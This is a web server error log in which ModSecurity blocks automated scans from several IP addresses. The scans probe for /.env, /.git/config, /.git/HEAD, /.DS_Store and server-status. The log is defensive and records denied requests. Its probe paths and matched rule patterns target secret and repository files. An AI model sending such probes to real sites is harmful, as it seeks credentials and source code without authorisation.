[Wed Nov 12 06:34:00.121827 2025] [:error] [pid 1691] [client 143.110.213.72:56170] [client 143.110.213.72] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aRQcSEImP-8k3CayT-0C5gAAAAk"]
[Wed Nov 12 06:34:00.122031 2025] [:error] [pid 1691] [client 143.110.213.72:56170] [client 143.110.213.72] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aRQcSEImP-8k3CayT-0C5gAAAAk"]
[Wed Nov 12 06:34:00.122217 2025] [:error] [pid 1691] [client 143.110.213.72:56170] [client 143.110.213.72] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aRQcSEImP-8k3CayT-0C5gAAAAk"]
[Wed Nov 12 06:34:00.470434 2025] [:error] [pid 6186] [client 143.110.213.72:56176] [client 143.110.213.72] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aRQcSFUfRNEntCYPOlxwwwAAABA"]
[Wed Nov 12 06:34:00.470679 2025] [:error] [pid 6186] [client 143.110.213.72:56176] [client 143.110.213.72] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aRQcSFUfRNEntCYPOlxwwwAAABA"]
[Wed Nov 12 06:34:00.470856 2025] [:error] [pid 6186] [client 143.110.213.72:56176] [client 143.110.213.72] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aRQcSFUfRNEntCYPOlxwwwAAABA"]
[Wed Nov 12 06:34:00.824514 2025] [:error] [pid 6184] [client 143.110.213.72:56192] [client 143.110.213.72] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aRQcSKdGg7924wvaFwF3oQAAAA4"]
[Wed Nov 12 06:34:00.824760 2025] [:error] [pid 6184] [client 143.110.213.72:56192] [client 143.110.213.72] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aRQcSKdGg7924wvaFwF3oQAAAA4"]
[Wed Nov 12 06:34:00.824920 2025] [:error] [pid 6184] [client 143.110.213.72:56192] [client 143.110.213.72] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aRQcSKdGg7924wvaFwF3oQAAAA4"]
[Wed Nov 12 07:47:24.700335 2025] [:error] [pid 6186] [client 45.144.212.58:36722] [client 45.144.212.58] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aRQtfFUfRNEntCYPOlxw0gAAABA"]
[Wed Nov 12 07:47:24.700652 2025] [:error] [pid 6186] [client 45.144.212.58:36722] [client 45.144.212.58] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aRQtfFUfRNEntCYPOlxw0gAAABA"]
[Wed Nov 12 07:47:24.700821 2025] [:error] [pid 6186] [client 45.144.212.58:36722] [client 45.144.212.58] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aRQtfFUfRNEntCYPOlxw0gAAABA"]
[Wed Nov 12 10:14:42.447947 2025] [authz_core:error] [pid 6196] [client 159.89.127.165:48020] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Wed Nov 12 10:14:43.626068 2025] [:error] [pid 6180] [client 159.89.127.165:48038] [client 159.89.127.165] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aRRQA1ur3vn9hHMI8OHj0AAAAAg"]
[Wed Nov 12 10:14:43.626292 2025] [:error] [pid 6180] [client 159.89.127.165:48038] [client 159.89.127.165] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aRRQA1ur3vn9hHMI8OHj0AAAAAg"]
[Wed Nov 12 10:14:43.626496 2025] [:error] [pid 6180] [client 159.89.127.165:48038] [client 159.89.127.165] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aRRQA1ur3vn9hHMI8OHj0AAAAAg"]
[Wed Nov 12 10:14:43.970177 2025] [:error] [pid 1399] [client 159.89.127.165:55812] [client 159.89.127.165] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aRRQA40A-UBLdRnyVSpnqAAAAAQ"]
[Wed Nov 12 10:14:43.970408 2025] [:error] [pid 1399] [client 159.89.127.165:55812] [client 159.89.127.165] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aRRQA40A-UBLdRnyVSpnqAAAAAQ"]
[Wed Nov 12 10:14:43.970571 2025] [:error] [pid 1399] [client 159.89.127.165:55812] [client 159.89.127.165] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aRRQA40A-UBLdRnyVSpnqAAAAAQ"]
[Wed Nov 12 10:14:44.334537 2025] [:error] [pid 1691] [client 159.89.127.165:55814] [client 159.89.127.165] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aRRQBEImP-8k3CayT-0DBQAAAAk"]
[Wed Nov 12 10:14:44.334804 2025] [:error] [pid 1691] [client 159.89.127.165:55814] [client 159.89.127.165] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aRRQBEImP-8k3CayT-0DBQAAAAk"]
[Wed Nov 12 10:14:44.334980 2025] [:error] [pid 1691] [client 159.89.127.165:55814] [client 159.89.127.165] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aRRQBEImP-8k3CayT-0DBQAAAAk"]
[Wed Nov 12 10:41:39.354875 2025] [authz_core:error] [pid 6186] [client 165.22.235.3:44682] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Wed Nov 12 10:41:40.574924 2025] [:error] [pid 6180] [client 165.22.235.3:44696] [client 165.22.235.3] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aRRWVFur3vn9hHMI8OHj1wAAAAg"]
[Wed Nov 12 10:41:40.575149 2025] [:error] [pid 6180] [client 165.22.235.3:44696] [client 165.22.235.3] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aRRWVFur3vn9hHMI8OHj1wAAAAg"]
[Wed Nov 12 10:41:40.575339 2025] [:error] [pid 6180] [client 165.22.235.3:44696] [client 165.22.235.3] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aRRWVFur3vn9hHMI8OHj1wAAAAg"]
[Wed Nov 12 10:41:40.921071 2025] [:error] [pid 6185] [client 165.22.235.3:44710] [client 165.22.235.3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aRRWVHyBItj8ZTct6SuyewAAAA8"]
[Wed Nov 12 10:41:40.921342 2025] [:error] [pid 6185] [client 165.22.235.3:44710] [client 165.22.235.3] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aRRWVHyBItj8ZTct6SuyewAAAA8"]
[Wed Nov 12 10:41:40.921544 2025] [:error] [pid 6185] [client 165.22.235.3:44710] [client 165.22.235.3] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aRRWVHyBItj8ZTct6SuyewAAAA8"]
[Wed Nov 12 10:41:41.266751 2025] [:error] [pid 6184] [client 165.22.235.3:44722] [client 165.22.235.3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aRRWVadGg7924wvaFwF3xQAAAA4"]
[Wed Nov 12 10:41:41.266984 2025] [:error] [pid 6184] [client 165.22.235.3:44722] [client 165.22.235.3] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aRRWVadGg7924wvaFwF3xQAAAA4"]
[Wed Nov 12 10:41:41.267802 2025] [:error] [pid 6184] [client 165.22.235.3:44722] [client 165.22.235.3] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aRRWVadGg7924wvaFwF3xQAAAA4"]
[Wed Nov 12 14:18:02.008403 2025] [:error] [pid 11036] [client 13.208.219.92:47272] [client 13.208.219.92] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aRSJCgYMvFvo_rQK4PJ-uwAAAAY"]
[Wed Nov 12 14:18:02.008665 2025] [:error] [pid 11036] [client 13.208.219.92:47272] [client 13.208.219.92] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aRSJCgYMvFvo_rQK4PJ-uwAAAAY"]
[Wed Nov 12 14:18:02.008844 2025] [:error] [pid 11036] [client 13.208.219.92:47272] [client 13.208.219.92] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aRSJCgYMvFvo_rQK4PJ-uwAAAAY"]
[Wed Nov 12 18:34:35.319504 2025] [:error] [pid 10985] [client 93.123.109.7:59920] [client 93.123.109.7] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aRTFK6_KEMA5UYPl2LRBwQAAAAo"]
[Wed Nov 12 18:34:35.319887 2025] [:error] [pid 10985] [client 93.123.109.7:59920] [client 93.123.109.7] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aRTFK6_KEMA5UYPl2LRBwQAAAAo"]
[Wed Nov 12 18:34:35.320148 2025] [:error] [pid 10985] [client 93.123.109.7:59920] [client 93.123.109.7] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aRTFK6_KEMA5UYPl2LRBwQAAAAo"]
[Wed Nov 12 18:39:53.199334 2025] [:error] [pid 11158] [client 13.57.244.51:46794] [client 13.57.244.51] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aRTGaVtgejOTJx5BSZKzVQAAABE"]
[Wed Nov 12 18:39:53.199595 2025] [:error] [pid 11158] [client 13.57.244.51:46794] [client 13.57.244.51] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aRTGaVtgejOTJx5BSZKzVQAAABE"]
[Wed Nov 12 18:39:53.199788 2025] [:error] [pid 11158] [client 13.57.244.51:46794] [client 13.57.244.51] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aRTGaVtgejOTJx5BSZKzVQAAABE"]
[Wed Nov 12 21:44:00.571206 2025] [:error] [pid 11035] [client 45.148.10.246:38826] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/HEAD"] [unique_id "aRTxkLnAAM7f_REZ45Jn3AAAAAU"]
